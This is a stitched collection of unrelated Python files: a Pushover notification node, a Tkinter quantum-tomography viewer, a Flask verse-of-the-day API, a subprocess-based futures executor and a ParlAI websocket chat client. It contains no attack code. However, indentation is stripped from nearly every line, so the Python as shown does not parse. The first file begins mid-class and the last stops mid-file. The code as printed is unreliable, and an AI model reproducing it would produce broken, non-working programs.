def get_pushover_priority(self,val=None):
LOGGER.info('val={}'.format(val))
if val is None:
val = int(self.get_priority())
else:
val = int(val)
val -= 2
LOGGER.info('val={}'.format(val))
return val
# Returns pushover sound name from our index number
def get_pushover_sound(self,val=None):
LOGGER.info('val={}'.format(val))
if val is None:
val = int(self.get_sound())
else:
val = int(val)
rval = 0
for item in self.sounds_list:
if item[2] == val:
rval = item[0]
LOGGER.info('{}'.format(rval))
return rval
# Returns pushover sound name by name, return default if not found
def get_pushover_sound_by_name(self,name):
LOGGER.info('name={}'.format(name))
rval = False
for item in self.sounds_list:
if name == item[0]:
rval = name
if rval is False:
LOGGER.error("No sound name found matching '{}".format(name))
rval = 'pushover'
LOGGER.info('{}'.format(rval))
return rval
def cmd_set_device(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_device(val)
def cmd_set_priority(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_priority(val)
def cmd_set_format(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_format(val)
def cmd_set_retry(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_retry(val)
def cmd_set_expire(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_expire(val)
def cmd_set_sound(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_sound(val)
def cmd_set_message(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_message(val)
def cmd_set_sys_short(self,command):
val = command.get('value')
LOGGER.info(val)
self.set_sys_short(val)
def cmd_send_message(self,command):
LOGGER.info('')
# Default create message params
md = self.controller.get_current_message()
# md will contain title and message
return self.do_send({ 'title': md['title'], 'message': md['message']})
def cmd_send_sys_short(self,command):
LOGGER.info('')
return self.do_send({ 'message': self.controller.get_sys_short()})
def cmd_send_my_message(self,command):
LOGGER.info('')
# Default create message params
md = self.controller.get_message_by_id(self.get_message())
# md will contain title and message
return self.do_send({ 'title': md['title'], 'message': md['message']})
def cmd_send_my_sys_short(self,command):
LOGGER.info('')
        return self.do_send({ 'message': self.get_sys_short()})
# command={'address': 'po_dev', 'cmd': 'GV10', 'query': {'Device.uom25': '2', 'Priority.uom25': '2', 'Format.uom25': '0',
# 'Sound.uom25': '0', 'Retry.uom56': '30', 'Expire.uom56': '10800', 'Content.uom145': 'Temp: 54.6°F\nHumidity: 81%'}}
def cmd_send_sys_short_with_params(self,command):
LOGGER.debug(f'command={command}')
query = command.get('query')
self.set_device(query.get('Device.uom25'))
self.set_priority(query.get('Priority.uom25'))
self.set_format(query.get('Format.uom25'))
self.set_sound(query.get('Sound.uom25'))
self.set_retry(query.get('Retry.uom56'))
self.set_expire(query.get('Expire.uom56'))
#Can't do this since it changes the current sys short message which has no driver?
#self.set_sys_short(query.get('Content.uom145'))
msg = query.get('Content.uom145')
if msg is None:
LOGGER.warning(f"No sys short message passed in?")
msg = "No Message Defined"
return self.do_send({ 'message': msg})
def do_send(self,params):
LOGGER.info('params={}'.format(params))
# These may all eventually be passed in or pulled from drivers.
if not 'message' in params:
params['message'] = "NOT_SPECIFIED"
if 'device' in params:
if is_int(params['device']):
                # It's an index, so get the name
params['device'] = self.get_device_name_by_index(params['device'])
if params['device'] is False:
# Bad param, can't send
return
else:
params['device'] = self.get_device_name_by_index()
if 'priority' in params:
params['priority'] = self.get_pushover_priority(params['priority'])
else:
params['priority'] = self.get_pushover_priority()
if 'sound' in params:
if is_int(params['sound']):
params['sound'] = self.get_pushover_sound(params['sound'])
else:
params['sound'] = self.get_pushover_sound_by_name(params['sound'])
else:
params['sound'] = self.get_pushover_sound()
if params['priority'] == 2:
if not 'retry' in params:
params['retry'] = self.get_retry()
if not 'expire' in params:
params['expire'] = self.get_expire()
if 'format' in params:
if params['format'] == 1:
params['html'] = 1
elif params['format'] == 2:
params['monospace'] = 1
del params['format']
elif not ('html' in params or 'monospace' in params):
p = self.get_format()
if p == 1:
params['html'] = 1
elif p == 2:
params['monospace'] = 1
params['user'] = self.user_key
params['token'] = self.app_key
#timestamp=None
#url=None
#url_title=None
#callback=None
#sound=None
#
# Send the message in a thread with retries
#
# Just keep serving until we are killed
self.thread = Thread(target=self.post,args=(params,))
self.thread.daemon = True
LOGGER.debug('Starting Thread')
st = self.thread.start()
LOGGER.debug('Thread start st={}'.format(st))
        # Always return True since we can't know the outcome yet; the send happens in the thread
return True
def post(self,params):
sent = False
retry = True
cnt = 0
# Clear error if there was one
self.set_error(ERROR_NONE)
LOGGER.debug('params={}'.format(params))
while (not sent and retry and (RETRY_MAX < 0 or cnt < RETRY_MAX)):
cnt += 1
LOGGER.info('try #{}'.format(cnt))
res = self.session.post("1/messages.json",params)
if res['status'] is True and res['data']['status'] == 1:
sent = True
self.set_error(ERROR_NONE)
else:
if 'data' in res:
if 'errors' in res['data']:
LOGGER.error('From Pushover: {}'.format(res['data']['errors']))
                # Retry unless the server returned a 4xx status code, which
                # indicates a permanent error that retrying cannot fix.
                LOGGER.debug('res={}'.format(res))
                if 'code' in res and res['code'] is not None and 400 <= res['code'] < 500:
LOGGER.warning('Previous error can not be fixed, will not retry')
retry = False
else:
LOGGER.warning('Previous error is retryable...')
if (not sent):
self.set_error(ERROR_MESSAGE_SEND)
if (retry and (RETRY_MAX > 0 and cnt == RETRY_MAX)):
LOGGER.error('Giving up after {} tries'.format(cnt))
retry = False
if (not sent and retry):
time.sleep(RETRY_WAIT)
#LOGGER.info('is_sent={} id={} sent_at={}'.format(message.is_sent, message.id, str(message.sent_at)))
return sent
    def get(self,url,params=None):
        # Use None as the default to avoid sharing a mutable default argument between calls
        if params is None:
            params = {}
        params['token'] = self.app_key
sent = False
retry = True
cnt = 0
while (not sent and retry and (RETRY_MAX < 0 or cnt < RETRY_MAX)):
cnt += 1
LOGGER.info('try {} #{}'.format(url,cnt))
res = self.session.get(url,params)
LOGGER.info('got {}'.format(res))
if res['status'] is True and res['data']['status'] == 1:
sent = True
self.set_error(ERROR_NONE)
else:
if 'data' in res:
if 'errors' in res['data']:
LOGGER.error('From Pushover: {}'.format(res['data']['errors']))
                # Retry unless the server returned a 4xx status code, which
                # indicates a permanent error that retrying cannot fix.
                LOGGER.debug('res={}'.format(res))
                if 'code' in res and res['code'] is not None and 400 <= res['code'] < 500:
LOGGER.warning('Previous error can not be fixed, will not retry')
retry = False
else:
LOGGER.warning('Previous error is retryable...')
if (not sent):
self.set_error(ERROR_UNKNOWN)
if (retry and (RETRY_MAX > 0 and cnt == RETRY_MAX)):
LOGGER.error('Giving up after {} tries'.format(cnt))
retry = False
if (not sent and retry):
time.sleep(RETRY_WAIT)
#LOGGER.info('is_sent={} id={} sent_at={}'.format(message.is_sent, message.id, str(message.sent_at)))
if 'data' in res:
return { 'status': sent, 'data': res['data'] }
else:
return { 'status': sent, 'data': False }
def rest_send(self,params):
LOGGER.debug('params={}'.format(params))
if 'priority' in params:
            # Our priorities start at 0 while Pushover's start at -2.
            # REST calls are assumed to pass Pushover numbers, so convert them to ours.
params['priority'] = int(params['priority']) + 2
return self.do_send(params)
_init_st = None
id = 'pushover'
drivers = [
{'driver': 'ST', 'value': 0, 'uom': 2},
{'driver': 'ERR', 'value': 0, 'uom': 25},
{'driver': 'GV1', 'value': 0, 'uom': 25},
{'driver': 'GV2', 'value': 2, 'uom': 25},
{'driver': 'GV3', 'value': 0, 'uom': 25},
{'driver': 'GV4', 'value': 30, 'uom': 56},
{'driver': 'GV5', 'value': 10800, 'uom': 56},
{'driver': 'GV6', 'value': 0, 'uom': 25},
{'driver': 'GV7', 'value': 0, 'uom': 25},
]
commands = {
#'DON': setOn, 'DOF': setOff
'SET_DEVICE': cmd_set_device,
'SET_PRIORITY': cmd_set_priority,
'SET_FORMAT': cmd_set_format,
'SET_RETRY': cmd_set_retry,
'SET_EXPIRE': cmd_set_expire,
'SET_SOUND': cmd_set_sound,
'SET_MESSAGE': cmd_set_message,
'SET_SYS_SHORT': cmd_set_sys_short,
'SEND': cmd_send_message,
'SEND_SYS_SHORT': cmd_send_sys_short,
'SEND_MY_MESSAGE': cmd_send_my_message,
'SEND_MY_SYS_SHORT': cmd_send_my_sys_short,
'GV10': cmd_send_sys_short_with_params,
}
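# Hedged sketch (not part of the node): the retry decision implemented in post()/get()
# above, isolated for clarity. 'send_once' stands in for a session.post/session.get
# call that returns a dict shaped like {'status': ..., 'code': ...}.
def _example_send_with_retry(send_once, retry_max=3, retry_wait=0):
    """Retry until success, a permanent 4xx error, or retry_max attempts."""
    cnt = 0
    while True:
        cnt += 1
        res = send_once()
        if res.get('status') is True:
            return True
        code = res.get('code')
        if code is not None and 400 <= code < 500:
            return False  # client error: retrying will not help
        if 0 < retry_max <= cnt:
            return False  # retry budget exhausted
        time.sleep(retry_wait)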
|
gui.py
|
import tomo
import numpy as np
from threading import Thread
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)
from matplotlib.backend_bases import key_press_handler
import matplotlib.animation as animation
from matplotlib import style
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.colors as colors
import matplotlib.cm as cm
import matplotlib.ticker as ticker
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
from PIL import ImageTk, Image
import os
Q,P,W,m,angles,volt = np.empty(0),np.empty(0),np.empty(0),np.empty(0),np.empty(0),np.empty(0)
q1C,q2C,p1C,p2C,densityC,kcC=-5,5,-5,5,50,5
color,angle1,angle2='cividis',45,45
t = None
buttonQQ,buttonNM=None,None
file1,file2,file3,change="SampleStates/rhoVac.dat","SampleStates/phiVac.dat","SampleStates/xVac.dat",False
class counter:
def __init__(self):
self.count = 0
self.start = False
self.end = False
def get(self):
return self.count
def set(self,x):
self.count = x
def started(self):
self.start = True
def ended(self):
self.end = True
class popupWindow(object):
def __init__(self,master):
top=self.top=tk.Toplevel(master)
self.l=tk.Label(top,text="N value")
self.l.pack()
self.e=tk.Entry(top,validate='key',validatecommand=(master.register(self.validate),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'))
self.e.delete(0,tk.END)
self.e.insert(0,"20")
self.e.pack()
self.l1=tk.Label(top,text="M value")
self.l1.pack()
self.f=tk.Entry(top,validate='key',validatecommand=(master.register(self.validate),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'))
self.f.delete(0,tk.END)
self.f.insert(0,"20")
self.f.pack()
self.b=tk.Button(top,text='Continue',command=self.cleanup)
self.b.pack()
def cleanup(self):
self.n=self.e.get()
self.m=self.f.get()
self.top.destroy()
def validate(self, action, index, value_if_allowed,
prior_value, text, validation_type, trigger_type, widget_name):
if value_if_allowed:
try:
int(value_if_allowed)
return True
except ValueError:
return False
else:
return False
contador = counter()
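# Added note: task() below re-schedules itself on the Tk event loop via win.after and
# polls the shared 'contador' object, which data() (run on a worker thread started in
# check()) updates; once the worker marks it ended, graficar() redraws the surface plot.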
def task():
    global contador, t
if contador.start:
progress.set(contador.get()*100/(densityC*densityC))
if contador.end:
graficar()
contador = counter()
t = None
win.after(200, task)
def styl(*args):
global Q,P,W,color,angle1,angle2
if color!=col.get() or angle1!=a1.get() or angle2!=a2.get():
color=col.get()
angle1=a1.get()
angle2=a2.get()
if np.size(Q)<1 or np.size(P)<1 or np.size(W)<1:
return
graficar()
def check():
global q1C,q2C,p1C,p2C,densityC,kcC,t
q1C,q2C,p1C,p2C,densityC,kcC=qmin.get(),qmax.get(),pmin.get(),pmax.get(),dense.get(),cut.get()
#b.step(50)
#win.update()
for widget in frame1.winfo_children():
widget.destroy()
t = Thread(target=data)
t.start()
bar()
'''
b=bar()
while(t.is_alive()):
b.wait_variable(progress)
b.update()
graficar()
'''
def data():
global Q,P,W,m,angles,volt,contador,file1,file2,file3, change
if np.size(m)<1 or np.size(angles)<1 or np.size(volt)<1 or change:
m,angles,volt=tomo.loadData(file1,file2,file3)
change=False
generateButton["state"] ='disabled'
contador.started()
Q,P,W = tomo.tomo(m,angles,volt,contador,q1=q1C,q2=q2C,p1=p1C,p2=p2C,density=densityC,kc=kcC)
contador.ended()
generateButton["state"] ='normal'
def changeData1():
file = tk.filedialog.askopenfilename(initialdir = os.path.abspath(""),title = "Load data m",filetypes = (("Data files","*.dat"),("all files","*.*")))
if file == "":
tk.messagebox.showinfo('Error','The file does not exist!')
global file1, change
file1 = file
change=True
txtFile1.set(file1.split("/")[-1])
def changeData2():
file = tk.filedialog.askopenfilename(initialdir = os.path.abspath(""),title = "Load data phi",filetypes = (("Data files","*.dat"),("all files","*.*")))
if file == "":
tk.messagebox.showinfo('Error','The file does not exist!')
global file2, change
file2 = file
change=True
txtFile2.set(file2.split("/")[-1])
def changeData3():
file = tk.filedialog.askopenfilename(initialdir = os.path.abspath(""),title = "Load data x",filetypes = (("Data files","*.dat"),("all files","*.*")))
if file == "":
tk.messagebox.showinfo('Error','The file does not exist!')
global file3, change
file3 = file
change=True
txtFile3.set(file3.split("/")[-1])
def fmt(x, pos):
a, b = '{:.0e}'.format(x).split('e')
b = int(b)
return r'${} \times 10^{{{}}}$'.format(a, b)
def densityMatrixQQ():
global W,Q,P
rhopP, listPosP, listNegP, rhopQ, listPosQ, listNegQ = tomo.quadratureToRho(W,Q,P)
'''
fig = plt.figure(num='Density matrix')
ax = fig.add_subplot(121, projection='3d')
ax.scatter(listPosP, listNegP,rhopP,c=rhopP,cmap='gray')
ax.set_title("P")
ax.view_init(elev=angle1, azim=angle2)
ax = fig.add_subplot(122, projection='3d')
ax.scatter(listPosQ, listNegQ,rhopQ,c=rhopQ,cmap='gray')
ax.set_title("Q")
ax.view_init(elev=angle1, azim=angle2)
plt.show()
'''
Xp, Yp, Zp = tomo.rhoFitting(rhopP, listPosP, listNegP,np.max(P),np.min(P))
Xq, Yq, Zq = tomo.rhoFitting(rhopQ, listPosQ, listNegQ,np.max(Q),np.min(Q))
#Xp, Yp, Zp = tomo.rhoInterpolate(rhopP, listPosP, listNegP,np.max(P),np.min(P))
#Xq, Yq, Zq = tomo.rhoInterpolate(rhopQ, listPosQ, listNegQ,np.max(Q),np.min(Q))
plotDensityMatrixQQ(Xp, Yp, Zp, Xq, Yq, Zq)
state = 0
def changeState(dir):
global state
if dir:
state+=1
else:
state-=1
if state == 0:
generateButton["state"] = "normal"
else:
generateButton["state"] = "disabled"
def argumentsRhoNM():
w = popupWindow(win)
changeState(True)
buttonNM["state"] = "disabled"
win.wait_window(w.top)
ni,mi=int(w.n),int(w.m)
densityMatrixNM(ni,mi)
buttonNM["state"] = "normal"
changeState(False)
def argumentsMatrixQQ():
changeState(True)
buttonQQ["state"] = "disabled"
densityMatrixQQ()
buttonQQ["state"] = "normal"
changeState(False)
def densityMatrixNM(ni,mi):
global W,Q,P
rhopP, listPosP, listNegP, rhopQ, listPosQ, listNegQ = tomo.quadratureToRho(W,Q,P)
Xp, Yp, Zp = tomo.rhoFitting(rhopP, listPosP, listNegP,np.max(P),np.min(P))
Xq, Yq, Zq = tomo.rhoFitting(rhopQ, listPosQ, listNegQ,np.max(Q),np.min(Q))
#Xp, Yp, Zp = tomo.rhoInterpolate(rhopP, listPosP, listNegP,np.max(P),np.min(P))
#Xq, Yq, Zq = tomo.rhoInterpolate(rhopQ, listPosQ, listNegQ,np.max(Q),np.min(Q))
rhon, nr, mr = tomo.rhoFock( Zq, Xq, Yq, ni,mi)
plotDensityMatrixNM(rhon, nr, mr)
def plotDensityMatrixQQ(Xp, Yp, Zp, Xq, Yq, Zq):
fig, axes = plt.subplots(figsize=(10,4),nrows=1, ncols=2, num="Density matrix in quadrature representation")
l=np.array([1/100000.,1/10000.,1/1000.,1/100.,1/10.,1])
ax = axes[0]
h = ax.contour(Xp,Yp,Zp,levels=l,norm=colors.LogNorm(vmin=1/1000000., vmax=1),cmap='Blues')
ax.set_xlabel(r'$p$')
ax.set_ylabel(r'$p^\prime$')
ax.set_aspect('equal')
ax = axes[1]
ax.contour(Xq,Yq,Zq,levels=l,norm=colors.LogNorm(vmin=1/1000000., vmax=1),cmap='Blues')
ax.set_xlabel(r'$q$')
ax.set_ylabel(r'$q^\prime$')
ax.set_aspect('equal')
fig.colorbar(h, ax=axes.ravel().tolist(),format=ticker.FuncFormatter(fmt))
#plt.savefig("rhoQPVac.png",dpi=300)
plt.show()
def plotDensityMatrixNM(rhon, nr, mr):
'''
rhon, nr, mr = tomo.rhoFock(rhopP, listPosP, listNegP,np.max(P),np.min(P))
X, Y = np.meshgrid(nr, mr)
x,y = X.ravel(),Y.ravel()
top = rhon.ravel()
top = np.abs(top)
bottom = np.zeros_like(top)
width = depth = 1
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(121, projection='3d')
dz = top
offset = dz + np.abs(dz.min())
fracs = offset.astype(float)/offset.max()
norm = colors.Normalize(fracs.min(), fracs.max())
color_values = cm.Greens(norm(fracs.tolist()))
ax.bar3d(x, y, bottom, width, depth, top, shade=True,color=color_values)
ax.set_ylabel("n")
ax.set_xlabel("m")
ax.set_zlabel(r"$|\rho_{nm}|$")
ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.xaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.yaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.zaxis._axinfo["grid"]['color'] = (1,1,1,0)
'''
fig = plt.figure(num="Density matrix in Fock representation")
X, Y = np.meshgrid(mr,nr)
x,y = X.ravel(),Y.ravel()
top = rhon.ravel()
top = np.abs(top)
bottom = np.zeros_like(top)
width = depth = 1
ax = fig.add_subplot(111, projection='3d')
dz = top
offset = dz + np.abs(dz.min())
fracs = offset.astype(float)/offset.max()
norm = colors.Normalize(fracs.min(), fracs.max())
color_values = cm.Greens(norm(fracs.tolist()))
ax.bar3d(x, y, bottom, width, depth, top, shade=True,color=color_values)
ax.set_ylabel("n")
ax.set_xlabel("m")
ax.set_zlabel(r"$|\rho_{nm}|$")
ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.xaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.yaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.zaxis._axinfo["grid"]['color'] = (1,1,1,0)
#plt.savefig("rhoNMVac.png",dpi=300)
plt.show()
def graficar():
for widget in frame1.winfo_children():
widget.destroy()
b = bar(indetermine=True)
global Q,P,W,color,angle1,angle2,buttonQQ,buttonNM
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
X, Y = np.meshgrid(P,Q)
ax.set_ylabel(r"$q$")
ax.set_xlabel(r"$p$")
ax.set_zlabel(r"$W(q,p)$")
ax.view_init(elev=angle1, azim=angle2)
h = ax.plot_surface(X, Y, W, rstride=1, cstride=1, cmap=color, edgecolor='none')
#ax.contour(X, Y, W)
ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.xaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.yaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.zaxis._axinfo["grid"]['color'] = (1,1,1,0)
#plt.savefig("number",dpi=300)
plt.close()
Plot = FigureCanvasTkAgg(fig, master=frame1)
Plot.draw()
Plot.get_tk_widget().pack(side='top', fill='both', expand=1)
b.destroy()
toolbar = NavigationToolbar2Tk(Plot, frame1)
toolbar.children['!button2'].pack_forget()
toolbar.children['!button3'].pack_forget()
buttonQQ = tk.Button(master=toolbar, text="Density Matrix quadrature", command= lambda: argumentsMatrixQQ())
buttonNM = tk.Button(master=toolbar, text="Density Matrix Fock", command= lambda: argumentsRhoNM())
buttonNM.pack(side="right")
buttonQQ.pack(side="right")
toolbar.update()
def bar(indetermine=False):
progress.set(0)
s = ttk.Style()
s.theme_use('clam')
TROUGH_COLOR = 'white'
BAR_COLOR = '#308fac'
s.configure("bar.Horizontal.TProgressbar", troughcolor=TROUGH_COLOR, bordercolor=TROUGH_COLOR, background=BAR_COLOR, lightcolor=BAR_COLOR, darkcolor=BAR_COLOR)
if indetermine:
loadingBar = ttk.Progressbar(frame1, mode="indeterminate", style="bar.Horizontal.TProgressbar")
loadingBar.start()
else:
loadingBar = ttk.Progressbar(frame1, style="bar.Horizontal.TProgressbar", variable=progress)
#loadingBar.config(maximum=densityC*densityC)
loadingBar.place(relx=.5, rely=.5, anchor="center",relwidth=0.5)
return loadingBar
if __name__ == "__main__":
win = tk.Tk()
win.geometry('1125x900')
win.title('Quantum Tomography')
win.config(cursor = "arrow")
frame1 = tk.Frame(win, background='#308fac')
frame1.place(relwidth=0.8, relheight=1)
frame2 = tk.Frame(win)
frame2.place(relx=0.8,relwidth=0.2, relheight=1)
tk.Label(master = frame2).grid(row=0, column=0)
tk.Label(master = frame2).grid(row=0, column=1)
tk.Label(master = frame2, text = "Q min:").grid(row=1, column=0)
tk.Label(master = frame2, text = "Q max:").grid(row=2, column=0)
tk.Label(master = frame2, text = "P min:").grid(row=3, column=0)
tk.Label(master = frame2, text = "P max:").grid(row=4, column=0)
tk.Label(master = frame2, text = "Density:").grid(row=5, column=0)
tk.Label(master = frame2, text = "Kc:").grid(row=6, column=0)
generateButton = tk.Button(frame2, text='Tomography', command=check)
generateButton.grid(row=7, column=1)
tk.Label(master = frame2).grid(row=8, column=0)
tk.Label(master = frame2).grid(row=8, column=1)
tk.Label(master = frame2, text = "Color:").grid(row=9, column=0)
tk.Label(master = frame2, text = "Angle 1:").grid(row=10, column=0)
tk.Label(master = frame2, text = "Angle 2:").grid(row=11, column=0)
tk.Label(master = frame2).grid(row=12, column=0)
tk.Label(master = frame2).grid(row=12, column=1)
tk.Label(master = frame2, text = "Data x:").grid(row=13, column=0)
tk.Label(master = frame2, text = "Data phi:").grid(row=14, column=0)
tk.Label(master = frame2, text = "Data pr:").grid(row=15, column=0)
txtFile3 = tk.StringVar()
bFile3 = tk.Button(frame2, textvariable=txtFile3, command=changeData3)
txtFile3.set(file3.split("/")[-1])
bFile3.grid(row=13, column=1)
txtFile2 = tk.StringVar()
bFile2 = tk.Button(frame2, textvariable=txtFile2, command=changeData2)
txtFile2.set(file2.split("/")[-1])
bFile2.grid(row=14, column=1)
txtFile1 = tk.StringVar()
bFile1 = tk.Button(frame2, textvariable=txtFile1, command=changeData1)
txtFile1.set(file1.split("/")[-1])
bFile1.grid(row=15, column=1)
tk.Label(master = frame2).grid(row=16, column=0)
tk.Label(master = frame2).grid(row=16, column=1)
qmin = tk.DoubleVar()
qmin.set(q1C)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=qmin, width=8).grid(row=1,column=1)
qmax = tk.DoubleVar()
qmax.set(q2C)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=qmax, width=8).grid(row=2,column=1)
pmin = tk.DoubleVar()
pmin.set(p1C)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=pmin, width=8).grid(row=3,column=1)
pmax = tk.DoubleVar()
pmax.set(p2C)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=pmax, width=8).grid(row=4,column=1)
dense = tk.IntVar()
dense.set(densityC)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=dense, width=8).grid(row=5,column=1)
cut = tk.DoubleVar()
cut.set(kcC)
tk.Spinbox(frame2, from_=-100,to=100, textvariable=cut, width=8).grid(row=6,column=1)
col = tk.StringVar()
op = ['viridis', 'plasma', 'inferno', 'magma', 'cividis','Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds']
col.set(color)
menu = tk.OptionMenu(frame2, col, *op, command=styl)
menu.config(width=8)
menu.grid(row=9,column=1)
a1 = tk.DoubleVar()
a1.set(angle1)
e = tk.Entry(frame2, textvariable = a1, width = 8)
e.grid(row=10,column=1)
e.bind("<FocusOut>",styl)
e.bind("<Return>",styl)
a2 = tk.DoubleVar()
a2.set(angle2)
e = tk.Entry(frame2, textvariable = a2, width = 8)
e.grid(row=11,column=1)
e.bind("<FocusOut>",styl)
e.bind("<Return>",styl)
frame2.grid_rowconfigure(8, weight=1)
frame2.grid_rowconfigure(12, weight=1)
frame2.grid_columnconfigure(0, weight=1)
frame2.grid_columnconfigure(1, weight=1)
progress = tk.IntVar()
tk.Label(master = frame2, text = "Progress %").grid(row=17, column=0)
pr = tk.Entry(frame2, textvariable = progress, width = 8)
pr.grid(row=17,column=1)
pr.config(state=tk.DISABLED)
win.after(1000, task)
win.mainloop()
|
main.py
|
from flask import Flask, jsonify
from flask_restful import Resource, Api
from driver_to_db import *
import json
import time  # used by run_schedule(); not guaranteed to arrive via the * import above
import schedule
from threading import Thread
app = Flask(__name__)
api = Api(app)
class Verses(Resource):
def get(self):
result = get_verse_of_today()
return result
class Longest(Resource):
def get(self):
result = get_longest()
return result
def run_schedule():
while 1:
schedule.run_pending()
time.sleep(1)
api.add_resource(Verses, '/verse')
api.add_resource(Longest, '/longest')
if __name__ == '__main__':
schedule.every().day.at("06:00").do(change_verse_of_day)
t = Thread(target=run_schedule)
t.start()
app.run(debug=True)
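# Hedged usage sketch (not part of the original service): with the app running on
# Flask's default host/port, the two endpoints could be exercised like this.  The
# URL below is an assumption; adjust host/port if the service is configured differently.
#
#   import requests
#   print(requests.get("http://127.0.0.1:5000/verse").json())
#   print(requests.get("http://127.0.0.1:5000/longest").json())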
|
executor.py
|
from concurrent.futures import _base
from multiprocessing import connection
import cPickle as pickle
import os
import select
import subprocess
import threading
import time
from .utils import debug
from . import utils
from .future import Future
class HostShutdown(RuntimeError):
pass
class DependencyFailed(RuntimeError):
pass
class Executor(_base.Executor):
def __init__(self, max_workers=None):
self._conn, child_conn = connection.Pipe()
cmd = ['python', '-m', 'uifutures.host', str(child_conn.fileno())]
env = None
self.proc = subprocess.Popen(cmd, env=env)
child_conn.close()
# Later, we may need to wait on the handshake to make sure that the
# process has started. But because the connection is an OS pipe it is
# already open, so we don't have to wait for now.
# Send some configuration over.
if max_workers:
self._conn.send(dict(
type='config',
max_workers=max_workers,
))
self._futures = {}
self._host_alive = True
self._host_listener_thread = threading.Thread(target=self._host_listener)
self._host_listener_thread.daemon = True
self._host_listener_thread.start()
def shutdown(self, wait=True):
self._conn.send(dict(
type='shutdown',
))
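# Background thread body: block on the host connection, decode each incoming
# message, and dispatch it to the matching _do_<type> handler until EOF.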
def _host_listener(self):
try:
while self._host_alive:
try:
rlist, _, _ = select.select([self._conn], [], [])
msg = self._conn.recv()
type_ = msg.pop('type', None)
# debug('Executor: new message of type %r:\n%s', type_, pprint.pformat(msg))
handler = getattr(self, '_do_' + (type_ or 'missing'), None)
if not handler:
debug('Executor: no handler for %r', type_)
continue
handler(**msg)
except IOError as e:
if e.errno == 35:
debug('Executor: socket temporarily unavailable; sleeping')
time.sleep(0.25)
else:
raise
except EOFError:
pass
# debug('Executor: EOF')
finally:
self._do_shutdown()
def _do_handshake(self, pid):
pass
def _do_shutdown(self):
self._host_alive = False
# debug('Executor: host shutdown')
for future in self._futures.itervalues():
future.set_exception(HostShutdown('host shutdown'))
def _do_result(self, uuid, **msg):
# debug('Executor: %s finished', uuid)
future = self._futures.pop(uuid)
result = (pickle.loads(msg['package']) if 'package' in msg else msg)['result']
future.set_result(result)
def _do_exception(self, uuid, **msg):
# debug('Executor: %s errored', uuid)
future = self._futures.pop(uuid)
exception = (pickle.loads(msg['package']) if 'package' in msg else msg)['exception']
future.set_exception(exception)
def submit(self, func, *args, **kwargs):
return self.submit_ext(func, args, kwargs)
def submit_ext(self, func, args=None, kwargs=None, name=None, icon=None, depends_on=None):
uuid = os.urandom(16).encode('hex')
func_name = utils.get_func_name(func)
depends_on = depends_on or []
if not isinstance(depends_on, (list, tuple)):
depends_on = [depends_on]
depends_on = [x.uuid for x in depends_on]
self._conn.send(dict(
type='submit',
uuid=uuid,
name=name or func_name,
icon=icon,
func_name=func_name,
depends_on=depends_on,
package=pickle.dumps(dict(
func=func,
args=tuple(args or ()),
kwargs=dict(kwargs or {}),
), protocol=-1),
))
future = Future(uuid)
self._futures[uuid] = future
return future
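# Hedged usage sketch (not part of this module).  It assumes the companion
# `uifutures.host` process referenced above is importable and that the submitted
# callable is picklable:
#
#   def add(a, b):
#       return a + b
#
#   executor = Executor(max_workers=2)
#   future = executor.submit(add, 1, 2)
#   print future.result()   # Python 2 print, matching this module
#   executor.shutdown()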
|
client.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
import websocket
import threading
from parlai.core.params import ParlaiParser
from parlai.scripts.interactive_web import WEB_HTML, STYLE_SHEET, FONT_AWESOME
from http.server import BaseHTTPRequestHandler, HTTPServer
SHARED = {}
def setup_interactive(ws):
SHARED['ws'] = ws
new_message = None
message_available = threading.Event()
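# Hand-off between the two transports: the browser's POST handler blocks on
# message_available until on_message() receives the model reply over the
# websocket and publishes it through new_message.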
class BrowserHandler(BaseHTTPRequestHandler):
"""
Handle HTTP requests.
"""
def _interactive_running(self, reply_text):
data = {}
data['text'] = reply_text.decode('utf-8')
if data['text'] == "[DONE]":
print('[ Closing socket... ]')
SHARED['ws'].close()
SHARED['wb'].shutdown()
json_data = json.dumps(data)
SHARED['ws'].send(json_data)
def do_HEAD(self):
"""
Handle HEAD requests.
"""
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_POST(self):
"""
Handle POST request, especially replying to a chat message.
"""
if self.path == '/interact':
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
self._interactive_running(body)
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
model_response = {'id': 'Model', 'episode_done': False}
message_available.wait()
model_response['text'] = new_message
message_available.clear()
json_str = json.dumps(model_response)
self.wfile.write(bytes(json_str, 'utf-8'))
